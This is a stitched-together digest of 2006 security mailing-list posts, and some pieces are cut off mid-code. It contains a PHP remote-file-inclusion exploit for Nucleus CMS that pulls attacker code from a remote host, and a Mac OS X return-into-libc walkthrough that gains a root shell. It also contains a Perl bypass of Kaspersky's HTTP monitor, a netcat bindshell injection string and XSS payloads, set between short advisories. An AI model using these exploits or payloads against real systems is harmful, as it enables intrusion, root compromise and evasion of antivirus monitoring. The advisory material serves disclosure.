langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: GN = HP General SW, MA = HP Management Agents, MI = Misc. 3rd party SW, MP = HP MPE/iX, NS = HP NonStop Servers, OV = HP OpenVMS, PI = HP Printing & Imaging, ST = HP Storage SW, TL = HP Trusted Linux, TU = HP Tru64 UNIX, UX = HP-UX, VV = HP Virtual Vault System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all war
Nucleus CMS <= 3.22 arbitrary remote inclusion
#!/usr/bin/php -q -d short_open_tag=on
http://retrogod.altervista.org\r\n\r\n";;
echo "this is called the \"deadly eyes of Sun-tzu\"\r\n";
echo "dork: Copyright . Nucleus CMS v3.22 . Valid XHTML 1.0 Strict . Valid CSS
. Back to top\r\n\r\n";
/*
works with:
register_globals=Om
allow_url_fopen=Om
*/
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to Nucleus\r\n";
echo "location: an arbitrary location with the code to include\r\n";
echo "cmd: a shell command\r\n";
echo "Options:\r\n";
echo " -p[port]:specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /nucleus/ http://somehost.com/ cat
./../../config.php\r\n";
echo "php ".$argv[0]." localhost /nucleus/ http://somehost.com/ ls -la
-p81\r\n";
echo "php ".$argv[0]." localhost / http://somehost.com/ ls -la
-P1.1.1.1:80\r\n\r\n";
echo "note, you need this code in http://somehost.com/ADMIN.php/index.html\r\n";;
echo "\r\n";
die;
}
/* software site: http://nucleuscms.org/
i) vulnerable code in nucleus/libs/PLUGINADMIN.php at lines 21-49:
...
global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_COOKIE_VARS, $HTTP_ENV_VARS,
$HTTP_POST_FILES, $HTTP_SESSION_VARS;
$aVarsToCheck = array('DIR_LIBS');
foreach ($aVarsToCheck as $varName)
{
if (phpversion() >= '4.1.0')
{
if ( isset($_GET[$varName])
|| isset($_POST[$varName])
|| isset($_COOKIE[$varName])
|| isset($_ENV[$varName])
|| isset($_SESSION[$varName])
|| isset($_FILES[$varName])
){
die('Sorry. An error occurred.');
}
} else {
if ( isset($HTTP_GET_VARS[$varName])
|| isset($HTTP_POST_VARS[$varName])
|| isset($HTTP_COOKIE_VARS[$varName])
|| isset($HTTP_ENV_VARS[$varName])
|| isset($HTTP_SESSION_VARS[$varName])
|| isset($HTTP_POST_FILES[$varName])
){
die('Sorry. An error occurred.');
}
}
}
include($DIR_LIBS . 'ADMIN.php');
...
so, if register_globals = On and allow_url_fopen = On, we have arbitrary remote
inclusion, poc:
http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://somehost.com/&cmd=ls%20-la
where on somehost.com we have some php code in
http://somehost.com/ADMIN.php/index.html
also, if register_globals = On & magic_quotes_gpc = Off:
http://[target]/[path_to_nucleus]/nucleus/libs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=/var/log/httpd/access_log%00&cmd=ls%20-la
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$loc=urlencode($argv[3]);
if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
{die("Check the path, it must begin and end with a trailing slash\r\n");}
$port=80;
$proxy="";
$cmd="";
for ($i=4; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{
$cmd.=" ".$argv[$i];
}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($
Non eXecutable Stack Lovin on OSX86
Non eXecutable Stack Lovin on OSX86
kf[at]digitalmunition[dot]com
05/18/06
After my obligatory Cinco De Mayo Corona hangover had passed, I decided it was
time to score a little
Non eXecutable Mac Mini Hotness from my local Apple retailer. After calmly
explaining to the salesman
"NO, I don't want a keyboard OR a mouse... no monitor! NO extra ram either,
JUST the MacMini!" I made
my purchase and returned home quickly.
Before I knew it the OS was installed and it was time to lift up the Mini's
skirt and see what was
going on behind the scenes. The first thing I wanted to do was verify that the
non executable stack
was actually doing what it was designed to do. Simply creating a vulnerable
program and trying to run
code from the stack was enough to validate that Apple had at the very least
made proper use of the NX
flag in their intel product line.
k-fs-computer:~ kf$ cat > test.c
// make me setuid root
main(int *argc, char **argv)
{
char buf[200];
sprintf(buf, "%s", argv[1]);
printf("test\n");
printf("buf: %s\n", buf);
return 0;
}
k-fs-computer:~ kf$ cc -o test test.c
test.c: In function 'main':
test.c:4: warning: incompatible implicit declaration of built-in function
'sprintf'
test.c:5: warning: incompatible implicit declaration of built-in function
'printf'
k-fs-computer:~ kf$ gdb -q ./test
Reading symbols for shared libraries .. done
(gdb) `perl -e 'print "A" x 212 . "ABCD"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /Users/kf/test `perl -e 'print "A" x 212 . "ABCD"'`
test
buf:
AAA...
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x44434241
0x44434241 in ?? ()
After locating the length to overwrite eip we simply need to locate our string
and
try to return into it.
(gdb) x/2s $edi
0xbbcc: "/Users/kf/test"
0xbbdb: 'A' ...
(gdb) r `perl -e 'print "A" x 212 . pack('l', 0xbbdb)'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /Users/kf/test `perl -e 'print "A" x 212 . pack('l',
0xbbdb)'`
test
buf:
AAA...
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0xbbdb
0xbbdb in ?? ()
As you can see from the KERN_PROTECTION_FAILURE Apple has done a successful job
at implementing the
Intel NX bit support in OSX. The presence of the NX bit alone however does not
mean that OSX is
immune to code execution attacks.
Classic non executable stack bypass techniques involve return into libc based
exploits and OSX is
not exempt from this style of attack by any means. The KERN_PROTECTION_FAILURE
failure we experienced
above can in theory be bypassed by doing a simple return into system(). In
practice it seems to work
quite well.
Plenty of papers outline the methods involved in return into system() style
attacks so I won't go into
them here. In essence what we need is for the buffer to have the following
structure:
< Ax212 > < system address > < exit address > < /bin/sh address >
(Thanks to JohnH - [EMAIL PROTECTED] for reminding me of the *proper* place to
stash "/bin/sh" )
Once everything is in place we are ready to rock, no shellcode hassle and no
KERN_PROTECTION_FAILURE
k-fs-computer:~ kf$ export SSH_CLIENT=" /bin/sh -i "
k-fs-computer:~ kf$ ./test `perl -e 'print "A"x212 . pack('l',0x90047530) .
pack('l', 0x90010bf0) .
pack('l',0xbd02)'`
test
buf:
AAA...
ýÿ¿
sh-2.05b# id
uid=501(kf) gid=501(kf) euid=0(root) groups=501(kf), 81(appserveradm),
79(appserverusr), 80(admin)
This should come as no shock... this technique is nothing new, but we should
keep in mind that this
IS an option for future exploits to take advantage of.
Having got *that* out of the way I wanted to get a little closer with my Mini,
you know *really*
get to know her. Since I had already peaked under the skirt a bit I decided it
was time for the
clothes to come completely off. =]
Consider this example program, how exactly can we make it give us some lovin?
#include
#define BUFLEN 1024
int main(void)
{
char buf[BUFLEN];
while(fgets(buf,BUFLEN,stdin) != NULL){
printf(buf);
printf("\n");
}
return 0;
}
If this were a linux box I would simply start down the path of overwriting the
.dtors section. Since
we are on an OSX machine this is simply not an option as .dtors does not exist
(unless you are using
Objective-C?). Saved return addresses were an option I coul
[OpenPKG-SA-2006.008] OpenPKG Security Advisory (openldap)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 OpenPKG Security AdvisoryThe OpenPKG Project http://www.openpkg.org/security/ http://www.openpkg.org [EMAIL PROTECTED] [EMAIL PROTECTED] OpenPKG-SA-2006.008 22-May-2006 Package: openldap Vulnerability: stack-based buffer overflow OpenPKG Specific:no Affected Releases: Affected Packages: Corrected Packages: OpenPKG CURRENT <= openldap-2.3.21-20060510 >= openldap-2.3.22-20060517 OpenPKG 2.5 <= openldap-2.3.11-2.5.0>= openldap-2.3.11-2.5.1 OpenPKG 2.4 <= openldap-2.2.27-2.4.0>= openldap-2.2.27-2.4.1 OpenPKG 2.3 <= openldap-2.2.23-2.3.1>= openldap-2.2.23-2.3.2 Description: According to a Secunia security advisory [0], a weakness exists in OpenLDAP [1] which is caused due to a boundary error in slurpd(8) within the handling of the status file. This can be exploited to cause a stack-based buffer overflow via an overly long hostname read from the status file. The weakness has been reported to be in OpenLDAP version 2.3.21 and earlier. References: [0] http://secunia.com/advisories/20126 [1] http://www.openldap.org/ For security reasons, this advisory was digitally signed with the OpenPGP public key "OpenPKG <[EMAIL PROTECTED]>" (ID 63C4CB9F) of the OpenPKG project which you can retrieve from http://pgp.openpkg.org and hkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org for details on how to verify the integrity of this advisory. -BEGIN PGP SIGNATURE- Comment: OpenPKG <[EMAIL PROTECTED]> iD8DBQFEch7ggHWT4GPEy58RAtYHAKDZiml+b7Pre9VLp+IfQJMK8Tck/gCfT5Uo +ZBkVV4tlIHscrezaR6x+rY= =U7I+ -END PGP SIGNATURE-
Kaspersky antivirus 6: HTTP monitor bypassing
Kaspersky antivirus 6
Kaspersky internet security 6
www.kaspersky.com
Vulnerable Systems: KAV6, KIS6
Detail:
The vulnerability is caused due to HTTP parsing errors in the HTTP monitor
(Kaspersky Web-antivirus).
Any mailicious software on local computer can bypass HTTP virus monitor.
Solution:
There is no known solution.
Exploit code:
This perl script could be run with ActiveState Perl 5.8:
use IO::Socket::INET;
use strict;
my( $h_srv, $h_port, $h_url ) = ( 'www.eicar.com', 'http(80)',
'http://www.eicar.com/download/eicar.com' );
syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)\n";
my $s = IO::Socket::INET->new( PeerAddr => $h_srv,
PeerPort => $h_port,
Proto=> 'tcp' );
die "socket: $!" unless $s;
sendthem( $s,
"GET $h_url HTTP/1.1",
"Host: $h_srv",
""
);
my $doc = read_body( $s, read_headers( $s ) );
syswrite STDOUT,
'document is <'.$doc.'> len='.length($doc)."\n";
sub sendthem {
my $s = shift;
my $c = 0;
foreach( @_ ) {
my @a = split //, $_;
++$c;
syswrite STDOUT, "query $c: ";
foreach( @a ) {
sendone( $s, $_ );
}
sendone( $s, "\r" );
sendone( $s, "\n" );
}
}
sub sendone {
my( $s, $v ) = @_;
$s->syswrite( $v );
syswrite STDOUT, $v;
# !!! comment next line to have monitoring working ;)
select( undef, undef, undef, 0.300 );
}
sub read_headers {
my( $s ) = @_;
my( $c, $cl ) = ( 0, 0 );
for( ;; ) {
my $l = read_line( $s );
++$c;
syswrite STDOUT, "header $c: $l";
syswrite STDOUT, "\r\n";
last if not $l and $c;
$cl = $1 if $l =~ /^Content-Length:\s+(\d+)/;
}
$cl;
}
sub read_line {
my( $s ) = @_;
my $str = '';
for( ;; ) {
my $v = '';
my $r = $s->sysread( $v, 1 );
die 'EOF reading headers!' unless $r;
last if $v eq "\n";
next if $v eq "\r";
$str .= $v;
}
return $str;
}
sub read_body {
my( $s, $cl ) = @_;
my( $str, $cli ) = ( '', $cl );
syswrite STDOUT, "reading body ...\n";
for( ;; ) {
my $v = '';
my $r = $s->sysread( $v, 1 );
last unless $r;
$str .= $v;
--$cl if $cli;
last if not $cl and $cli;
}
return $str;
}
SkyeShoutbox <= v.1.2.0 XSS
SkyeShoutbox <= v.1.2.0 XSS Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate (possible defacement) SkyeShoutbox doesn't filter any input at all, thus allowing attackers to inject arbitrary html or javascript. Nomenumbra
Russcom Ping Remote code execution
Russcom Ping Remote code execution Discovered by: Nomenumbra Date: 21/5/2006 impact:high (Remote code execution) Russcom's Ping script allows attackers to execute arbitrary code trough command piping after the ip (e.g 127.0.0.1 | nc -l -p 666 -e /bin/sh would grant a bindshell) Nomenumbra
Russcom PHPImages lack of validation
Russcom PHPImages lack of validation Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate Russcom's PHPImages doesn't validate if the uploaded file is an image, it just checks for the extension, thus allowing an attacker to upload php scripts with a .gif extension for example, potentially allowing him (trough file inclusion vulns for example) to execute arbitrary code. Nomenumbra
QBv14 XSS
QBv14 XSS Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate (possible defacement) QBv14 doesn't filter anything at all, in short: XSS heaven. Nomenumbra
IpLogger <= 1.7 XSS
IpLogger <= 1.7 XSS Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate (potential privilege escalation,possible defacement) tjthedj's IpLogger (http://tjthedj.us/projects/iplogger/) suffers from XSS in a user's useragent. It is possible to construct a useragent containing javascript, thus being displayed to the user once he check's the logs. Nomenumbra
DSChat <= 1.0 XSS
DSChat <= 1.0 XSS Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate (possible defacement) DSChat is a PHP-based chatscript which does no filtering against XSS whatsoever, thus allowing anyone to insert html or javascript in the chatbox. Nomenumbra
Re: Circumventing quarantine control in Windows 2003 and ISA 2004
Dear Memet Anwar, MA> The problem is due to how the requirements are MA> validated, it is trivial for users to trick RRAS/ISA into believing that the MA> client's system are always aligned with the requirements, regardless the MA> actual condition. If you have local administrator level access to the box you can bypass any "internal" checks for this box. You can bypass any Domain policies. You can do everything. Quarantine Control was not designed to protect against attack of this kind. It's a tool to check policy matching, not to protect http://www.microsoft.com/technet/prodtechnol/isa/2004/plan/vpnroamingquarantine.mspx -=-=-=-=- Quote begin -=-=-=-=- Although Quarantine Control does not protect against attackers, computer configurations for authorized users can be verified and, if necessary, corrected before they can access the network. -=-=-=-=-= Quote end =-=-=-=-=- -- ~/ZARAZA http://www.security.nnov.ru/
Chatty improper input sanitizing
Chatty improper input sanitizing Discovered by: Nomenumbra Date: 21/5/2006 impact:moderate (possible defacement) Chatty is a PHP-based chatscript allowing users to chat over the web. Subscribing with a username like this: alert(%22xss%22) would cause major xss in the chatroom. Nomenumbra
